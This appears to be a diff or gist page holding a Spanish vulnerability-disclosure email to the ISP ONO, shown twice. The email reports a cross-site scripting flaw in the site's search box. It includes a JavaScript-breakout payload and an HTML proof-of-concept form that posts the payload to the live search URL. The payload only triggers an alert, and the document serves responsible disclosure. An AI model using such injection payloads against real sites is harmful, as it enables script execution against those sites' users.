MiguelBel · August 29, 2015 14:05
diff --git a/ono.es b/ono.es
 Escribo este email siendo consciente de que ninguno de los emails a los que he enviado el presente correo es el adecuado pero no he encontrado ningún email más adecuado así que ruego que remitan al departamento correspondiente que supongo que será el de informática.

 ------------------

 Hola, he encontrado una vulnerabilidad en su sitio web que permite ejecutar código javascript 

 Para probar dicha vulnerabilidad hay dos formas:

 -El html que adjunto.

 -Poner el siguiente vector de ataque:

 holahola'}]; alert('xss'); var b = [{'some':'yes

 en el buscador de la barra lila de la parte superior en esta url http://www.ono.es/buscador/ aunque imagino que hay más.


 Un saludo.

 ====


 <!DOCTYPE html>
 <html lang="en">
 <head>
  <meta charset="UTF-8">
  <title>Proof of concept ONO</title>
 </head>
      <div class="searchbox">
        <form action="http://www.ono.es/buscador/" method="post" enctype="application/x-www-form-urlencoded">
          <input type="text" value="holahola'}]; alert('xss'); var b = [{'some':'yes" class="text" name="searcher_input_keywords" id="searcher-mini-input">
          <input type="hidden" name="searcher_input_authenticated" value="false">
          <input type="hidden" name="searcher_input_ipONO" value="true">
          <input type="hidden" name="searcher_input_mobileDevice" value="false">
          <input type="hidden" name="searcher_input_showFAQ" value="false">
          <input type="hidden" name="searcher_input_showOnlyFAQ" value="false">
          <input type="hidden" name="searcher_input_startPage" value="0">
          <input type="hidden" name="searcher_input_clientType" value="residencial">
          <input type="hidden" name="searcher_input_currentUrl" value="/buscador/">
          <input type="hidden" name="searcher_input_scope" value="">
          <input type="hidden" name="searcher_input_category" value="">
          <input type="hidden" name="searcher_input_logid" value="">
          <input type="hidden" name="searcher_input_clientid" value="j_idt70">
          <button class="submit">Buscar</button>
        </form>
      </div>
 </body>
 </html>
	Escribo este email siendo consciente de que ninguno de los emails a los que he enviado el presente correo es el adecuado pero no he encontrado ningún email más adecuado así que ruego que remitan al departamento correspondiente que supongo que será el de informática.

	------------------

	Hola, he encontrado una vulnerabilidad en su sitio web que permite ejecutar código javascript

	Para probar dicha vulnerabilidad hay dos formas:

	-El html que adjunto.

	-Poner el siguiente vector de ataque:

	holahola'}]; alert('xss'); var b = [{'some':'yes

	en el buscador de la barra lila de la parte superior en esta url http://www.ono.es/buscador/ aunque imagino que hay más.


	Un saludo.

	====


	<!DOCTYPE html>
	<html lang="en">
	<head>
	<meta charset="UTF-8">
	<title>Proof of concept ONO</title>
	</head>
	<div class="searchbox">
	<form action="http://www.ono.es/buscador/" method="post" enctype="application/x-www-form-urlencoded">
	<input type="text" value="holahola'}]; alert('xss'); var b = [{'some':'yes" class="text" name="searcher_input_keywords" id="searcher-mini-input">
	<input type="hidden" name="searcher_input_authenticated" value="false">
	<input type="hidden" name="searcher_input_ipONO" value="true">
	<input type="hidden" name="searcher_input_mobileDevice" value="false">
	<input type="hidden" name="searcher_input_showFAQ" value="false">
	<input type="hidden" name="searcher_input_showOnlyFAQ" value="false">
	<input type="hidden" name="searcher_input_startPage" value="0">
	<input type="hidden" name="searcher_input_clientType" value="residencial">
	<input type="hidden" name="searcher_input_currentUrl" value="/buscador/">
	<input type="hidden" name="searcher_input_scope" value="">
	<input type="hidden" name="searcher_input_category" value="">
	<input type="hidden" name="searcher_input_logid" value="">
	<input type="hidden" name="searcher_input_clientid" value="j_idt70">
	<button class="submit">Buscar</button>
	</form>
	</div>
	</body>
	</html>